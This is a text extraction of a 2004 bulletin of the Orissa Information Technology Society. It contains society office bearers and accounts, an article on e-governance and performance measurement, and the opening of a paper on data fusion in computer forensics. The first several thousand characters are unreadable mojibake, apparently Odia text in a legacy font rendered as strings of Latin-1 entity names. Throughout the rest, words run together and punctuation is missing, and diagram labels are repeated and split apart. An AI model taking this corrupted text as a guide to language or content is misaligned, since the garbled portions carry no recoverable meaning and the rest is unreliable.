OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 11: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

